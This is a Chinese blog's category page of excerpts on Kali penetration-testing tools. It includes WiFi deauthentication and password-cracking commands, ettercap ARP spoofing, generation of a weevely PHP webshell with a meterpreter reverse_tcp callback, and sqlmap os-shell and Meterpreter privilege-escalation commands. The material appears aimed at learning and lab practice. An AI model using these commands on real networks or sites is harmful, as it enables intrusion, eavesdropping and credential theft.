kali工具篇
文章平均质量分 58
学习kali中比较好用的工具
不习惯有你
一个喜欢渗透的小伙子,正在成为大佬的路上
展开
-
Ubuntu快速安装MSF命令
MSF是渗透测试人员必备的一款工具,十分强大,可以让不懂黑客知识得人都能成为黑客。Metasploit 是一个免费的、可下载的框架,通过它可以很容易地获取、开发幵对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的与业级漏洞攻击工具。当 H.D. Moore 在 2003 年发布Metasploit 时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁戒者刚刚打过补丁的漏洞。原创 2023-04-03 11:45:05 · 1350 阅读 · 0 评论 -
Kali渗透测试:使用Metasploit对Web应用的攻击
Web应用程序的漏洞数量众多,这里我们以其中一个命令注入漏洞为例复现一下。这种漏洞源于Web应用程序没有对用户输入的内容进行准确的验证,从而导致操作系统执行了攻击者输入的命令。版权声明:本文为CSDN博主「Bruce_Liuxiaowei」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。原文链接:https://blog.csdn.net/weixin_41905135/article/details/124789617。转载 2023-04-02 16:02:47 · 90 阅读 · 0 评论 -
web扫描工具Xray
1、burpsuite作为Xray的上游代理(抓Xray发包)浏览器 -> Xray -> burpsuite -> 服务端。浏览器 -> burpsuite ->Xray -> 服务端。2、Xray作为burpsuite的上游代理(协助测试)foxyproxy、switchyomega等代理插件。Xray.exe -h 查看帮助。2、启动Xray、生产ca证书。4、运行Xray,开启监听。针对一个单个url地址检测。谁离浏览器近设置谁的代理。1、设置允许扫描的域名。原创 2022-10-22 19:42:11 · 860 阅读 · 0 评论 -
ERROR: Get “https://registry-1.docker.io/v2/vulhub/solr/manifests/sha256:84255b20a2d134fc97bbb0fab7c
1.首先到docker目录下: cd /etc/docker。转载 2022-09-13 13:17:39 · 266 阅读 · 0 评论 -
wifi密码破解案列
命令:airodump-ng -c 自己选择CH --bssid mac -w 路径 wlan0mon。Aircrack-ng Aircrack-ng 是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,命令:aircrack-ng -a2 -b BSSID -w pass.txt ~/01/*.cap。命令:aireplay-ng -0 50 -a 路由mac地址 -c 主机 wlan0mon。原创 2022-09-03 11:49:26 · 3177 阅读 · 2 评论 -
DNS劫持案列
ettercap -qT -i eth0 -M arp:remote - w 1.pcap /kali地址//靶机主机/-w, -write 将嗅探到的数据写入pcap文件-F, -filter 加载过滤器(内容过滤 器)-P, -plugin 开始该插件-l, -liface 显示所有的网络接口。原创 2022-09-01 18:42:19 · 404 阅读 · 0 评论 -
wireshark初步认识
最近在学习内容,涉及到了与或非、异或的逻辑运算,学校的学知识已经模糊,复习一波。使用二进制0、1分别设与假(False)和真(True)。与(and)运算运算逻辑:两个同时为真结果真 例子: 1 & 1 = 1 结果为真1 &a…tcp contains "http" 显示包含 “http”字符串的tcp数据包。这个强大的工具可以捕捉网络中的数据,并为用户提供关于网络和上层协议的各种信息。xor ^^ 逻辑异或(运算逻辑:两个不同则为真)...原创 2022-08-30 17:36:07 · 2495 阅读 · 0 评论 -
Metasploit拿到shell后 低权限---提权篇
下载地址https://github.com/AonCyberLabs/Windows-Exploit-Suggester1、安装xlrd包(注意python2、3版本的pip问题)使用python2 的pip来安装xlrd包命令:python2-m pip install xlrd==1.2.0注意:安装的xlrd版本必须为1.2.0版本,否则使用时会报错,原因是:最近xlrd更新到了2.0.1版本,只支持.xls文件。e.高级 -> 添加 -> 选择主体 -> 输入用户名,检查名称 -> 确定。原创 2022-08-24 14:36:11 · 1387 阅读 · 0 评论 -
Metasploit会话常用命令
getdesktop 获取当前的Meterpreter桌面。getsystem 尝试将你的权限升为本地系统的权限。screenshort 获取目标桌面屏幕截图。sysinfo 获取远程系统的有关信息。ipconfig 显示网络接口信息。getlwd 显示本地工作目录。通过反弹shell获得的会话的常用命令。execute 执行命令。ps 列出正在运行的进程。edit 编辑文件。原创 2022-08-19 16:33:59 · 238 阅读 · 0 评论 -
Metasploit框架介绍与基本命令
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。Exploits 攻击模块 利用发现的安全漏洞或者配置弱点对远程目标系统进行攻击从而获得对远程目标系统访问的代码组件。Auxiliary 辅助模块 为渗透测试信息搜集提供了大量的辅助模块支持。开启数据库的原因是由于msf模块比较多,不开启数据库的话速度会很慢。......原创 2022-08-17 11:53:10 · 763 阅读 · 0 评论 -
Linux下的菜刀weevely
backdoor_meterpreter -payload php/meterpreter/reverse_tcp -l host 本机ip -port 端口。命令:weevely generate -obfuscator cleartext1_php 例子:weevely http://192.168.3.248/shell.php shell。命令:weevely generate原创 2022-08-16 18:46:54 · 347 阅读 · 0 评论 -
SQLmap之sql注入(二)
可以使用 -v 参数,0-6显示的数据一次详细,如果想看到sqlmap发送的测试payload最好使用的等级就是3。python sqlmap.py -l 文件名 --batch --smart。注意:log文件中如果有sqlmap无法读取的字符(ascii码之外的字符)会读取失败。一、执行--os-shell的系统操作的要求。3、GPC为off,php主动转义的功能关闭。2.把记录的log文件放sqlmap目录下。产生交互式的操作系统的shell,用来执行cmd命令。1.判断可注入的参数。...原创 2022-08-14 11:59:37 · 419 阅读 · 0 评论 -
SQLmap之sql注入(一)
-level >= 3 时sqlmap会尝试对User-Angent、referer进行注入。h、风险等级,共4个等级,当为2时会增加基于事件的测试语句,3会增加or语句的sql注入:参数 -risk。c、sqlmap扫描等级(1-5):--level >= 2 时sqlmap会尝试注入cookie参数。SQLMAP注入教程-11种常见SQLMAP使用方法详解 - APT-101 - 博客园。二、使用--os-shell之后会生成两个文件。一、执行--os-shell的系统操作的要求。......原创 2022-08-13 21:49:57 · 904 阅读 · 0 评论 -
SQLmap之sql注入原理利用
-dbs 枚举可用的数据库。--is--dba 枚举数据库权限。--password 枚举数据库用户密码。--current-db 枚举当前数据库。--current-user 枚举当前用户。--hostname 枚举主机名称。三、通过数据库查询数据表信息。四、通过数据表查询字段信息。五、通过字段枚举字段内容。一、查看数据库相关信息。...原创 2022-08-11 18:09:34 · 292 阅读 · 0 评论 -
Kali安装beef-xss
不更新可能会出现下面的情况:metasploit-framework : 依赖: ruby (< 1:2.8) 但是 1:3.0+1kali1 正要被安装。#把192.168.199.129替换成本机IP。原创 2022-08-10 17:54:11 · 2157 阅读 · 0 评论 -
web漏洞扫描器-appscan
扫描报告和AWVS差不多,我觉得AppScan与AWVS使用起来还是有一些相似点的,工具毕竟都是给人来用的,所以使用起来不会太难。安装在windows操作系统上,可以对web应用进行自动化的应用安全扫描测试。免费破解的AppScan,找了很多都是过期的,这篇文章还是非常的好。f.启动扫描 - 保护扫描文件。a.新建扫描 - 常规扫描。e.测试策略 - 缺省值。d.登录方法 - 无2。三、使用AppScan进行扫描。四、阅读AppScan扫描报告。一、AppScan简介。二、安装AppScan。...原创 2022-08-05 18:15:00 · 979 阅读 · 0 评论 -
web漏洞扫描器-awvs
进入/home/acunetix/.acunetix_trial目录下可修改密码。这一步需要注意,/home下的acunetix为隐藏文件我们应该打开显示隐藏文件。Web扫描器也是在为我们做信息搜集,为接下来的渗透测试做准备。的文章,如果装错可以按照上面卸载再重新安装。二、安装Linux AWVS。三、使用AWVS进行扫描。四、阅读AWVS扫描报告。一、Web漏洞扫描工具。五、AWVS常见问题。...原创 2022-08-04 16:54:42 · 1941 阅读 · 0 评论 -
信息收集之cms指纹识别
五、Webfingerhttps//github.com/se55i0n/Webfinger。四、脚本CMSeekhttps//github.com/Tuhinshubhra/CMSeek。三、插件wappalyzerhttps//www.wappalyzer.com。一、云悉在线http//www.yunsee.cn。二、国外在线cdnplanet。原创 2022-07-31 23:21:29 · 1531 阅读 · 0 评论 -
信息收集之目录扫描-dirbuster
由于后台人员的疏忽或者不当的设计,导致不应该被前端用户看到的数据被轻易的访问到。原理程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。owasp项目,dirbuster是一个多线程的基于java的应用程序设计用于暴力破解web应用服务器上的目录名和文件名的工具。探测网站的结构,可以扫到敏感文件、后台文件、数据库文件、和泄露信息的文件。a.目录遍历漏洞(前端数据包传输的时候没有验证可能会出现)优点可以扫出网站的结构,就非常的好。......原创 2022-07-31 16:03:43 · 1962 阅读 · 0 评论 -
在kali上搭建vulhub漏洞靶场
对于漏洞的复现我们不知道如何的话我们可以百度或者查看相关的资料进行复现。转载 2022-07-21 14:52:12 · 183 阅读 · 0 评论